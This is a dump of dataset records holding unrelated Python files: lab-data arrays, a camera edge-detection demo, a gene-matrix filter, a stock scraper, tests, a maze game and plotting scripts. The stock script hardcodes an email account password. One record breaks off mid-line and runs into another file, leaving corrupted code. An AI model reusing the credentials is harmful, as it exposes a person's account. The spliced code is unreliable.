array(th['A_2090_A_379_V_sd'])\na2090a379bsd = array(th['A_2090_A_379_D7_sd'])\na2090a379vbsd = array(th['A_2090_A_379_D7_V_sd'])\n\n# bacteria\nb2090bsd = array(sb['B_A_2090_D7_sd'])\nb2090vbsd = array(oh['B_A_2090_D7_V_sd'])\nbsd = array(sb['B_sd'])\nb379bsd = array(sb['B_A_379_D7_sd'])\nb379vbsd = array(oh['B_A_379_D7_V_sd'])\nba2090a379bsd = array(th['B_A_2090_A_379_D7_sd'])\nba2090a379vbsd = array(th['B_A_2090_A_379_D7_V_sd'])\n\n# viruses\nv2090vsd = array(sv['V_A_2090_V_sd'])\nv2090vbsd = array(oh['V_A_2090_D7_V_sd'])\nv379vbsd = array(oh['V_A_379_D7_V_sd'])\nva2090a379bsd = array(th['V_A_2090_A_379_D7_sd'])\nva2090a379vbsd = array(th['V_A_2090_A_379_D7_V_sd'])\n\n# put in dictionaries for fitting\ncont_2090 = {'htimes': dtimes, 'hms': a2090, 'hss': a2090sd}\ncont_379 = {'htimes': dtimes, 'hms': a379, 'hss': a379sd}\ncont_D7 = {'htimes': dtimes, 'hms': b, 'hss': bsd}\n\ninf_379bac = {'htimes': dtimes, 'vtimes': dtimes,\n              'hms': a379b, 'vms': b379b, 'hss': a379bsd, 'vss': b379bsd}\ninf_2090bac = {'htimes': dtimes, 'vtimes': dtimes,\n               'hms': a2090b, 'vms': b2090b, 'hss': a2090bsd, 'vss': b2090bsd}\ninf_2090vir = {'htimes': dtimes[:6], 'vtimes': dtimes[:6], 'hms': a2090v[:6],\n               'vms': v2090v[:6], 'hss': a2090vsd[:6], 'vss': v2090vsd[:6]}\n","sub_path":"mikrodyno_depHeroku/read_all_data.py","file_name":"read_all_data.py","file_ext":"py","file_size_in_byte":9933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"152187255","text":"from maix import nn\nfrom PIL import Image, ImageDraw\nimport numpy as np\nimport time\nfrom maix import display, camera\n\ncamera.config(size=(224, 224))\n\nmodel = {\n \"param\": \"/root/models/sobel_int8.param\",\n \"bin\": \"/root/models/sobel_int8.bin\"\n}\n\ninput_size = (224, 224, 3)\noutput_size = (222, 222, 3)\n\noptions = {\n \"model_type\": \"awnn\",\n \"inputs\": {\n \"input0\": input_size\n },\n \"outputs\": {\n \"output0\": output_size\n },\n \"mean\": [127.5, 127.5, 127.5],\n \"norm\": [0.0078125, 0.0078125, 0.0078125],\n}\nprint(\"-- load model:\", model)\nm = nn.load(model, opt=options)\nprint(\"-- load ok\")\n\nwhile 1:\n img = camera.capture()\n if not img:\n time.sleep(0.01)\n continue\n print(\"-- read image ok\")\n print(\"-- forward model with image as input\")\n out = m.forward(img, quantize=True, layout=\"hwc\")\n # print(\"-- read image ok\")\n # out = out.reshape(222, 222, 3)\n print(\"-- out:\", out.shape, out.dtype)\n out = out.astype(np.float32).reshape(output_size)\n out = (np.abs(out) * 255 / out.max()).astype(np.uint8)\n img2 = Image.fromarray(out, mode=\"RGB\")\n\n display.show(img2)\n","sub_path":"ext_modules/_maix_nn/example/load_forward_sobel_edge_camera.py","file_name":"load_forward_sobel_edge_camera.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"476168010","text":"from sys import argv,stderr\nfrom gzip import open as gzopen\n\nmatrixIn=argv[1]\nvalidSpecimensIn=argv[2]\nvalidProbes=set()\nnumValidProbes=0\nif len(argv)==4:\n validProbeFile=argv[3]\n with open(validProbeFile) as f:\n for line in f:\n validProbes.add(line.rstrip())\n numValidProbes+=1 \n\nvalidSpecimens=set()\nvalidDonors=set()\nwith open(validSpecimensIn) as f:\n for line in f:\n validSpecimens.add(line.rstrip())\n validDonors.add('-'.join(line.rstrip().split('-')[:-1]))\n\nwith gzopen(matrixIn,'rt') as f:\n processedSpecimens=set()\n headerChunks=next(f).rstrip().split('\\t')\n validColumns=[0]\n for i in range(1,len(headerChunks)):\n currentSpecimen=headerChunks[i]\n if not currentSpecimen[-1].isdigit():\n currentSpecimen=currentSpecimen[:-1]\n specimenChunks=currentSpecimen.split('-')\n healthySpecimen=int(specimenChunks[-1])>10\n currentDonor='-'.join(specimenChunks[:-1])\n validDonor=False\n if currentSpecimen in validSpecimens or (healthySpecimen and currentDonor in validDonors):\n if currentSpecimen not in processedSpecimens:\n processedSpecimens.add(currentSpecimen)\n validColumns.append(i)\n filteredChunks=[]\n for i in validColumns:\n if i>0:\n if not headerChunks[i][-1].isdigit():\n headerChunks[i]=headerChunks[i][:-1]\n filteredChunks.append(headerChunks[i])\n print(*filteredChunks,sep='\\t')\n expectedColumns=len(headerChunks)\n for line in f:\n lineChunks=line.rstrip().split('\\t')\n if lineChunks[0].startswith(\"ENSGR\"):\n continue\n if lineChunks[0].startswith(\"ENSG\"):\n lineChunks[0]=lineChunks[0].split('.')[0]\n currentColumns=len(lineChunks)\n if currentColumns==1:\n continue\n if numValidProbes>0:\n if lineChunks[0] not in validProbes:\n continue\n if currentColumns 1:\n main(args[1])\n else:\n main()","sub_path":"test/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"29979169","text":"'''\nCreated on 25th/June/2017\n\n@author: aubrey.wang\n'''\n\nimport email.mime.multipart\nimport email.mime.text\nimport smtplib\nimport time, datetime\nfrom urllib import error\nimport urllib.request\n\n\ndef get_raw_url(req_name, list_data):\n website = 'http://hq.sinajs.cn/list=s_' + req_name;\n \n try:\n resp = urllib.request.urlopen(website)\n html = resp.read() \n\n except error.URLError as e:\n print('URLError reason: ', e.reason)\n \n # resp = urllib.request.urlopen(website)\n # html = resp.read()\n\n str = html.decode('gbk', 'ignore');\n\n # print(time.strftime(\"%Y-%m-%d %H:%M:%S\"),str)\n \n flag_colon_appear = 0\n data_order = 0\n str_data = \"\"\n piece_data = []\n\n for char in str:\n if (char == ',') and (flag_colon_appear == 0):\n piece_data.append(req_name)\n flag_colon_appear = 1\n continue\n \n if (char == ',') and (flag_colon_appear == 1):\n flag_colon_appear = 1 \n piece_data.append( (float) (str_data) )\n \n str_data = ''\n continue\n \n if (char == '\"') and (flag_colon_appear == 1):\n flag_colon_appear = 1\n \n piece_data.append( (float) (str_data) )\n # piece_data.insert(0, time.strftime(\"%Y-%m-%d %H:%M:%S\") )\n piece_data.insert(0, time.time())\n \n print('piece_data:', piece_data)\n \n list_data.append(piece_data)\n \n piece_data = []\n str_data = ''\n \n data_order += 1\n continue\n \n if flag_colon_appear == 1:\n str_data += char \n return list_data\n\ndef get_newest_data(stock_raw_data_list):\n for get_newest_data_i in reversed(stock_raw_data_list):\n # print('get_newest_data_name:',get_newest_data_i)\n # print('data length:',len(stock_raw_data_list))\n return get_newest_data_i\n \ndef is_trade_time():\n is_trade_time = ( (datetime.datetime.now().hour == 9) and (datetime.datetime.now().minute > 29) ) \\\n or (datetime.datetime.now().hour == 10) \\\n or ( (datetime.datetime.now().hour == 11) and (datetime.datetime.now().minute < 31) ) \\\n or (datetime.datetime.now().hour == 13) \\\n or (datetime.datetime.now().hour == 14) \\\n or ( (datetime.datetime.now().hour == 15) and (datetime.datetime.now().minute < 1) )\n \n return is_trade_time\n\ndef list_write2file(file_name, send_list):\n file_to_write = open(file_name,'a')\n\n for item in send_list:\n file_to_write.write(str(item)[1:-1]+'\\n')\n \n file_to_write.close()\n \ndef send_mail(flag, strdata):\n msg = email.mime.multipart.MIMEMultipart()\n msg['from'] = '18566260586m@sina.cn'\n msg['to'] = '18566260586@163.com'\n msg['subject'] = flag\n \n content = strdata\n \n txt = email.mime.text.MIMEText(content)\n \n msg.attach(txt)\n \n smtp=smtplib.SMTP()\n \n smtp.connect('smtp.sina.cn', '25')\n smtp.login('18566260586m@sina.cn', 'wk19910415')\n \n smtp.sendmail(\"18566260586m@sina.cn\",\"18566260586@163.com\",str(msg))\n smtp.quit()\n \n print(time.strftime(\"%Y-%m-%d %H:%M:%S\"), ' send_data:', flag)","sub_path":"app_main/app_data_io.py","file_name":"app_data_io.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"191899194","text":"#!/usr/bin/env python3\n# -*- coding:UTF-8 -*-\n\nfrom __future__ import print_function\n\nfrom __future__ import absolute_import\n\nimport subprocess\nfrom sys import stdout\n\n\ndef main():\n print('start....')\n #TerminalCheck.py -a 192.168.0.109 -p 0 0\n# proc = subprocess.Popen('python3 TerminalCheck.py -a 192.168.0.109 -p 0 0'\n# ,stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n# stderr=subprocess.PIPE,shell=True)\n \n# proc = subprocess.Popen('python3 TerminalCheck.py -a 192.168.0.109 -p 0 0'\n# ,shell=True)\n# print('haha')\n# while True:\n# output, usrerror = proc.communicate(timeout=2)\n# print(output)\n \n \n proc1 = subprocess.Popen('python3 call_sub.py'\n ,stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,shell=True)\n exe_result1 = proc1.stdout.read()\n print(\"mdsb:\" + exe_result1.decode())\n \n now_md5sum = subprocess.check_output(\"md5sum config.txt\",shell=True)\n print(\"now_md5sum:\" + now_md5sum.decode())\n \nif __name__ == '__main__':\n main()","sub_path":"step1/configobj_test/subprocess_test.py","file_name":"subprocess_test.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"241551054","text":"\"\"\" Tests for `yatsm.gis.tilespec`\n\"\"\"\nimport pytest\n\nfrom yatsm.gis import tilespec\n\n\n@pytest.fixture\ndef example_spec(request):\n for k in tilespec.TILESPECS:\n return tilespec.TILESPECS[k]\n\n\nEX_CRS_GEOG = (\n (0., 0.),\n 'epsg:4326',\n (0.00025, 0.0025),\n (1., 1.),\n 'geographic'\n)\nEX_CRS_ALBERS = (\n (-2565600., 3314800.),\n 'epsg:5070',\n (30, 30),\n (250, 250),\n 'albers_conus'\n)\nEX_CRS_UTM = (\n (653385., 4828815.),\n 'epsg:32619',\n (30, 30),\n (5000, 5000),\n 'utm19n'\n)\n\n\ntilespec_params = pytest.mark.parametrize(\n ('ul', 'crs', 'res', 'size', 'desc'),\n [EX_CRS_GEOG,\n EX_CRS_ALBERS,\n EX_CRS_UTM]\n)\n\n\n# tilezilla.tilespec.TileSpec\n@tilespec_params\ndef test_tilespec(ul, crs, res, size, desc):\n tilespec.TileSpec(ul, crs, res, size, desc=desc)\n\n\n# FAILURE: CRS PARSING PROBLEMS\n@tilespec_params\ndef test_tilespec_fail_crs_1(ul, crs, res, size, desc):\n with pytest.raises(ValueError):\n tilespec.TileSpec(ul, 'not a crs', res, size, desc)\n\n\n# FAILURE: INDEXING PROBLEMS\ndef test_tilespec_fail_1(example_spec):\n with pytest.raises(IndexError):\n example_spec[-1]\n\n\ndef test_tilespec_fail_2(example_spec):\n with pytest.raises(TypeError):\n example_spec[([0, 1], [0, 1])]\n","sub_path":"tests/gis/test_gis_tilespec.py","file_name":"test_gis_tilespec.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"612322572","text":"# Prepare training and test data.\nimport os\nimport pyspark\nimport unittest\nimport xmlrunner\nfrom mmlspark.RankingAdapter import RankingAdapter\nfrom mmlspark.RankingEvaluator import RankingEvaluator\nfrom mmlspark.RankingTrainValidationSplit import RankingTrainValidationSplit, RankingTrainValidationSplitModel\nfrom pyspark.ml import Pipeline\nfrom pyspark.ml.feature import StringIndexer\nfrom pyspark.ml.tuning import *\nfrom pyspark.ml.tuning import *\nfrom pyspark.sql.types import *\nfrom pyspark.ml.recommendation import ALS\n\n\nclass RankingSpec(unittest.TestCase):\n\n @staticmethod\n def getRatings():\n cSchema = StructType([StructField(\"originalCustomerID\", IntegerType()),\n StructField(\"newCategoryID\", IntegerType()),\n StructField(\"rating\", IntegerType()),\n StructField(\"notTime\", IntegerType())])\n\n ratings = pyspark.sql.SparkSession.builder.getOrCreate().createDataFrame([\n (0, 1, 4, 4),\n (0, 3, 1, 1),\n (0, 4, 5, 5),\n (0, 5, 3, 3),\n (0, 7, 3, 3),\n (0, 9, 3, 3),\n (0, 10, 3, 3),\n (1, 1, 4, 4),\n (1, 2, 5, 5),\n (1, 3, 1, 1),\n (1, 6, 4, 4),\n (1, 7, 5, 5),\n (1, 8, 1, 1),\n (1, 10, 3, 3),\n (2, 1, 4, 4),\n (2, 2, 1, 1),\n (2, 3, 1, 1),\n (2, 4, 5, 5),\n (2, 5, 3, 3),\n (2, 6, 4, 4),\n (2, 8, 1, 1),\n (2, 9, 5, 5),\n (2, 10, 3, 3),\n (3, 2, 5, 5),\n (3, 3, 1, 1),\n (3, 4, 5, 5),\n (3, 5, 3, 3),\n (3, 6, 4, 4),\n (3, 7, 5, 5),\n (3, 8, 1, 1),\n (3, 9, 5, 5),\n (3, 10, 3, 3)], cSchema)\n return ratings\n\n @staticmethod\n def get_pyspark():\n return pyspark.sql.SparkSession.builder.master(\"local[*]\").config('spark.driver.extraClassPath',\n \"../../../../../BuildArtifacts/packages/m2/com/microsoft/ml/spark/mmlspark_2.11/0.0/mmlspark_2.11-0.0.jar\").getOrCreate()\n\n def test_adapter_evaluator(self):\n self.get_pyspark()\n\n ratings = self.getRatings()\n\n user_id = \"originalCustomerID\"\n item_id = \"newCategoryID\"\n rating_id = 'rating'\n\n user_id_index = \"customerID\"\n item_id_index = \"itemID\"\n\n customer_indexer = StringIndexer(inputCol=user_id, outputCol=user_id_index).fit(ratings)\n items_indexer = StringIndexer(inputCol=item_id, outputCol=item_id_index).fit(ratings)\n\n als = ALS(userCol=user_id_index, itemCol=item_id_index, ratingCol=rating_id)\n\n adapter = RankingAdapter(mode='allUsers', k=5, recommender=als)\n\n pipeline = Pipeline(stages=[customer_indexer, items_indexer, adapter])\n output = pipeline.fit(ratings).transform(ratings)\n print(str(output.take(1)) + \"\\n\")\n\n metrics = ['ndcgAt', 'fcp', 'mrr']\n for metric in metrics:\n print(metric + \": \" + str(RankingEvaluator(k=3, metricName=metric).evaluate(output)))\n\n\nif __name__ == \"__main__\":\n result = unittest.main(testRunner=xmlrunner.XMLTestRunner(output=os.getenv(\"TEST_RESULTS\", \"TestResults\")), \\\n failfast=False, buffer=False, catchbreak=False)\n","sub_path":"src/recommendation/src/test/python/RankingSpec.py","file_name":"RankingSpec.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"164705123","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nclass Solution(object):\n def maxSubArray(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums:\n return 0\n length = len(nums)\n if length == 1:\n return nums[0]\n last_max_sum = nums[0]\n max_subarray_sum = nums[0]\n for i in range(1, length):\n last_max_sum = max(last_max_sum+nums[i], nums[i])\n max_subarray_sum = max(max_subarray_sum, last_max_sum)\n return max_subarray_sum\n","sub_path":"leetcode/053.py","file_name":"053.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"174131965","text":"from room import Room\nfrom player import Player\nfrom world import World\n\nimport random\nfrom ast import literal_eval\n\n# Load world\nworld = World()\n\n\n# You may uncomment the smaller graphs for development and testing purposes.\n# map_file = \"maps/test_line.txt\"\n# map_file = \"maps/test_cross.txt\"\n# map_file = \"maps/test_loop.txt\"\n# map_file = \"maps/test_loop_fork.txt\"\nmap_file = \"maps/main_maze.txt\"\n\n# Loads the map into a dictionary\nroom_graph = literal_eval(open(map_file, \"r\").read())\nworld.load_graph(room_graph)\n\n# Print an ASCII map\nworld.print_rooms()\nplayer = Player(world.starting_room)\n\ntraversal_path = []\n\n\n# move player helper function\ndef move_player(direction):\n player.travel(direction)\n traversal_path.append(direction)\n\n# * Recursive DFT\n\n\ndef find_path_rec(visited=None, previous=None, move=None):\n # visited dict starts as none, previous room starts as none, move input starts as none\n curr_id = player.current_room.id\n connected_rooms = player.current_room.get_exits()\n # * enable easily determining what room the player came from -- previous room is the room opposite Move\n reverse_dirs = {\n 'n': 's',\n 's': 'n',\n 'e': 'w',\n 'w': 'e'\n }\n\n # * instantiates visited set at first\n if visited == None:\n visited = {}\n\n # * create empty set in visited when curr_id not in visited\n if curr_id not in visited:\n visited[curr_id] = {}\n\n # * handles movement command -- if the function recieves a move, the curr_id is assigned to the move applied to the previous room\n if move is not None:\n visited[previous][move] = curr_id\n\n # * the previous room is the room at the opposite-provided direction\n # ! handle after checking move\n if previous is not None:\n visited[curr_id][reverse_dirs[move]] = previous\n\n # * determines if there are remaining neighbors to be visited and recursively visits\n if len(visited[curr_id]) < len(connected_rooms):\n for direction in connected_rooms:\n if direction not in visited[curr_id]:\n move_player(direction)\n find_path_rec(visited, previous=curr_id, move=direction)\n\n # * If the player has visited fewer than total rooms move the player backwards\n if len(visited) < len(room_graph):\n move_player(reverse_dirs[move])\n\n\n# ! executes recursive function to determine path\nfind_path_rec()\n\nvisited_rooms = set()\nplayer.current_room = world.starting_room\n\n\n# * Allows player to be controlled by dft function\n# Moves player according to traversal_path\nfor direction in traversal_path:\n player.travel(direction)\n current_room = player.current_room\n visited_rooms.add(current_room)\n\nprint('traversal_path: ', traversal_path)\n\nif len(visited_rooms) == len(room_graph):\n print(\n f\"TESTS PASSED: {len(traversal_path)} moves, {len(visited_rooms)} rooms visited\")\nelse:\n print(\"TESTS FAILED: INCOMPLETE TRAVERSAL\")\n print(f\"{len(room_graph) - len(visited_rooms)} unvisited rooms\")\n\n\n#######\n# UNCOMMENT TO WALK AROUND\n#######\nplayer.current_room.print_room_description(player)\nwhile True:\n cmds = input(\"-> \").lower().split(\" \")\n if cmds[0] in [\"n\", \"s\", \"e\", \"w\"]:\n player.travel(cmds[0], True)\n elif cmds[0] == \"q\":\n break\n else:\n print(\"I did not understand that command.\")\n","sub_path":"adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"298437830","text":"from __future__ import print_function\nimport numpy as np\nfrom spt3g import core\n\nclass PlotG3MapHistograms(object):\n def __init__(self, g3_map_key, frame_type, save_folder, save_tag, n_bins, \n log_y = False, log_x= False):\n self.g3_map_key = g3_map_key\n self.frame_type = frame_type\n self.save_folder = save_folder\n self.save_tag = save_tag\n self.bins = n_bins\n self.log = log_y\n \n self.log_x = log_x\n \n self.scan_num = 0\n\n def __call__(self, frame):\n import pylab as pl\n if self.frame_type != frame.type:\n return\n mp = frame[self.g3_map_key]\n vals = np.nan_to_num(np.asarray(mp.values()))\n pl.clf()\n\n if self.log_x:\n print(min(vals), max(vals))\n start = np.log(min(vals[np.where(vals > 0)]))/np.log(10)\n stop = np.log(max(vals))/np.log(10)\n bins = np.logspace(start - 1, stop + 1, num = self.bins)\n else:\n bins = self.bins\n #import pdb; pdb.set_trace()\n pl.hist(vals, bins = bins, log=self.log)\n\n if self.log_x:\n pl.semilogx()\n\n pl.savefig('%s/%s_%d.png' % (self.save_folder, self.save_tag, self.scan_num ))\n self.scan_num += 1\n\n\nclass ReportStatistics(object):\n def __init__(self, type, labels, funcs, also_plot = True, plot_dir = '.'):\n assert(len(labels) == len(funcs))\n\n self.type = type\n self.labels = labels\n self.funcs = funcs\n self.also_plot = also_plot\n self.vals = [ [] for l in labels]\n self.plot_dir = plot_dir\n def __call__(self, frame):\n if frame.type == self.type:\n for i in range(len(self.labels)):\n self.vals[i].append( self.funcs[i](frame))\n if frame.type == core.G3FrameType.EndProcessing:\n for i in range(len(self.labels)):\n print(self.labels[i],\":\")\n print(self.vals[i])\n print('\\n\\n')\n if self.also_plot:\n import pylab as pl\n pl.clf()\n pl.ylabel(self.labels[i])\n pl.xlabel('Frame')\n pl.plot(self.vals[i])\n pl.savefig(self.plot_dir + '/' + self.labels[i] + '.png')\n","sub_path":"util/python/datavis.py","file_name":"datavis.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"135019823","text":"from itertools import cycle\n\ndef byte_xor(A, B):\n\tzip_list = zip(A, cycle(B)) if len(A) > len(B) else zip(cycle(A), B)\n\treturn bytes([_a ^ _b for _a, _b in zip_list])\n\ndef get_character_score(character):\n\tkeys = {\n\t'a': 0.08167,\n 'b': 0.01492,\n 'c': 0.02782,\n 'd': 0.04253,\n 'e': 0.12702,\n 'f': 0.02228,\n 'g': 0.02015,\n 'h': 0.06094,\n 'i': 0.06094,\n 'j': 0.00153,\n 'k': 0.00772,\n 'l': 0.04025,\n 'm': 0.02406,\n 'n': 0.06749,\n 'o': 0.07507,\n 'p': 0.01929,\n 'q': 0.00095,\n 'r': 0.05987,\n 's': 0.06327,\n 't': 0.09056,\n 'u': 0.02758,\n 'v': 0.00978,\n 'w': 0.02360,\n 'x': 0.00150,\n 'y': 0.01974,\n 'z': 0.00074,\n ' ': 0.13000}\n\tif(character in keys):\n\t\treturn keys[character]\n\treturn 0\n\n\ndef get_best_english_string(_bytes):\n\tresult = {\"key\":' ', \"score\":0, \"text\":' '}\n\tfor key in range(32,127):\n\t\txor_bytes = byte_xor(_bytes, (key).to_bytes(2, byteorder='big'))\n\t\ttext = xor_bytes.decode(\"utf-8\") \n\t\ttext_score = get_english_score(text)\n\t\tif text_score > result[\"score\"]:\n\t\t\tresult[\"key\"] = key\n\t\t\tresult[\"score\"] = text_score\n\t\t\tresult[\"text\"] = text\n\treturn result\n\ndef get_english_score(text):\n\ttext = text.lower()\n\ttext_scores = []\n\tfor character in text:\n\t\ttext_scores.append(get_character_score(character))\n\treturn sum(text_scores)\n\n\ndef main():\n print(get_character_score('a') + get_character_score('b') + get_character_score('c'))\n print(get_english_score(\"abc\"))\n _bytes = bytes.fromhex(\"1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736\")\n print(get_english_score(byte_xor(_bytes, b'X').decode(\"utf-8\")))\n print(get_english_score(byte_xor(_bytes, bytes(b'z')).decode(\"utf-8\")))\n\nif __name__ == '__main__':\n main()\n","sub_path":"05.Security/tasks/cryptopals-challanges/Python/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"449140343","text":"def solve(str_number):\n num = int(str_number)\n \n if num == 0:\n return \"INSOMNIA\" \n \n result = num\n \n digits = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n \n \n while True:\n str_result = str(result)\n digits = [d for d in digits if d not in str_result]\n if len(digits) == 0:\n return str_result\n else:\n result += num\n\n\n# Read file\nwith open('input.txt') as f:\n content = f.readlines()\n\nf_output = open(\"output.txt\", \"wb\")\nfor i in range(1, int(content[0]) +1):\n f_output.write(\"Case #\" + str(i) + \": \" +solve(content[i]) + \"\\r\\n\");\nf_output.close()\n\n\n","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_Kostadinov_ProblemACountingSheep.py","file_name":"16_0_1_Kostadinov_ProblemACountingSheep.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"333691293","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\nimport MDAnalysis\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport csv\r\n\r\nparams = {'legend.fontsize': 8,\r\n 'legend.handlelength': 2}\r\nplt.rcParams.update(params)\r\n\r\nz,h1,h2,h3,h4,h5,h6,h7,h8,h9,h10,h11,h12,h13,h14,h15,h16,h17,h18,h19,h20,h21 = [],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[]\r\n\r\nwith open(r\"C:\\Users\\emfla\\Desktop\\CANES_2019\\research-project-assignment\\umbrella-sampling-data\\hairpin1_pulling_umbrella\\b=20\\histo_data.xvg\") as f:\r\n reader = csv.reader(f,delimiter = \"\\t\")\r\n for line in reader:\r\n a = np.transpose(line)\r\n z = np.append(z,a[0])\r\n h1 = np.append(h1,a[1])\r\n h2 = np.append(h2, a[2])\r\n h3 = np.append(h3, a[3])\r\n h4 = np.append(h4, a[4])\r\n h5 = np.append(h5, a[5])\r\n h6 = np.append(h6, a[6])\r\n h7 = np.append(h7, a[7])\r\n h8 = np.append(h8, a[8])\r\n h9 = np.append(h9, a[9])\r\n h10 = np.append(h10, a[10])\r\n h11 = np.append(h11, a[11])\r\n h12 = np.append(h12, a[12])\r\n h13 = np.append(h13, a[13])\r\n h14 = np.append(h14, a[14])\r\n h15 = np.append(h15, a[15])\r\n h16 = np.append(h16, a[16])\r\n h17 = np.append(h17, a[17])\r\n h18 = np.append(h18, a[18])\r\n h19 = np.append(h19, a[19])\r\n h20 = np.append(h20, a[20])\r\n h21 = np.append(h21, a[21])\r\n \r\n\r\nif h1[0]!=float: \r\n z = np.array(z,dtype=float)\r\n h1 = np.array(h1,dtype=float)\r\n h2 = np.array(h2,dtype=float)\r\n h3 = np.array(h3,dtype=float)\r\n h4 = np.array(h4,dtype=float)\r\n h5 = np.array(h5,dtype=float)\r\n h6 = np.array(h6,dtype=float)\r\n h7 = np.array(h7,dtype=float)\r\n h8 = np.array(h8,dtype=float)\r\n h9 = np.array(h9,dtype=float)\r\n h10 = np.array(h10,dtype=float)\r\n h11 = np.array(h11,dtype=float)\r\n h12 = np.array(h12,dtype=float)\r\n h13 = np.array(h13,dtype=float)\r\n h14 = np.array(h14,dtype=float)\r\n h15 = np.array(h15,dtype=float)\r\n h16 = np.array(h16,dtype=float)\r\n h17 = np.array(h17,dtype=float)\r\n h18 = np.array(h18,dtype=float)\r\n h19 = np.array(h19,dtype=float)\r\n h20 = np.array(h20,dtype=float)\r\n h21 = np.array(h21,dtype=float)\r\n\r\n\r\nhistos = [h1,h2,h3,h4,h5,h6,h7,h8,h9,h10,h11,h12,h13,h14,h15,h16,h17,h18,h19,h20,h21]\r\n\r\nplt.figure()\r\nfor i in range(len(histos)):\r\n plt.plot(z,histos[i],lw=2)\r\nplt.xlabel('$z$ ($nm$)')\r\n#plt.xlim(1.2,4.2)\r\nplt.ylim(0)\r\nplt.ylabel('Count')\r\nplt.savefig('hairpin_histo.png')\r\nplt.show()\r\n\r\ndef return_intersection(hist_1,hist_2):\r\n minima = np.minimum(hist_1,hist_2)\r\n intersection = np.true_divide(np.sum(minima),np.sum(hist_2))\r\n return intersection\r\n\r\nfraction = []\r\nfor i in range(len(histos)-1):\r\n fraction.append(return_intersection(histos[i],histos[i+1]))\r\n \r\nfraction_2 = []\r\nfor i in range(len(histos)-2):\r\n fraction_2.append(return_intersection(histos[i],histos[i+2]))\r\n\r\nplt.clf()\r\nplt.figure()\r\nplt.plot(fraction,label='Fractional overlap')\r\nplt.plot(np.arange(0,35,1),np.repeat(0.3173,35),'k--',label=r'$1\\sigma$ overlap')\r\nplt.plot(np.arange(0,35,1),np.repeat(0.0455,35),'r--',label=r'$2\\sigma$ overlap')\r\nplt.plot(np.arange(0,35,1),np.repeat(0.0027,35),'g--',label=r'$3\\sigma$ overlap')\r\nplt.xlim(0,20)\r\nplt.ylim(0,1)\r\nplt.xlabel(r'Histogram pairs ($x$, $x+1$)')\r\nplt.ylabel(r'Fractional first neighbour overlap')\r\nplt.savefig('hairpin_first_overlap.png')\r\nplt.show()\r\n 
\r\nplt.clf()\r\nplt.figure()\r\nplt.plot(fraction_2,label='Fractional overlap')\r\nplt.plot(np.arange(0,35,1),np.repeat(0.3173,35),'k--',label=r'$1\\sigma$ overlap')\r\nplt.plot(np.arange(0,35,1),np.repeat(0.0455,35),'r--',label=r'$2\\sigma$ overlap')\r\nplt.plot(np.arange(0,35,1),np.repeat(0.0027,35),'g--',label=r'$3\\sigma$ overlap')\r\nplt.xlim(0,20)\r\nplt.ylim(0,1)\r\nplt.xlabel(r'Histogram pairs ($x$, $x+2$)')\r\nplt.ylabel(r'Fractional second neighbour overlap')\r\nplt.savefig('hairpin_second_overlap.png')\r\nplt.show()\r\n \r\n'''\r\ndef histogram_overlap(h1,h2):\r\n sm = 0.0\r\n for i in range(len(z)):\r\n sm += min(h1[i],h2[i])\r\n return sm\r\ndef total_area(h1,h2):\r\n a = 0.0\r\n for i in range(len(z)):\r\n a += max(h1[i],h2[i])\r\n return a\r\n\r\nfraction = []\r\nfor i in range(len(histos)-1):\r\n fraction.append(histogram_overlap(histos[i],histos[i+1])/total_area(histos[i],histos[i+1]))\r\n \r\nfraction_2 = []\r\nfor i in range(len(histos)-2):\r\n fraction_2.append(histogram_overlap(histos[i],histos[i+2])/total_area(histos[i],histos[i+2])) \r\n''' ","sub_path":"backup/overlap_hairpin.py","file_name":"overlap_hairpin.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
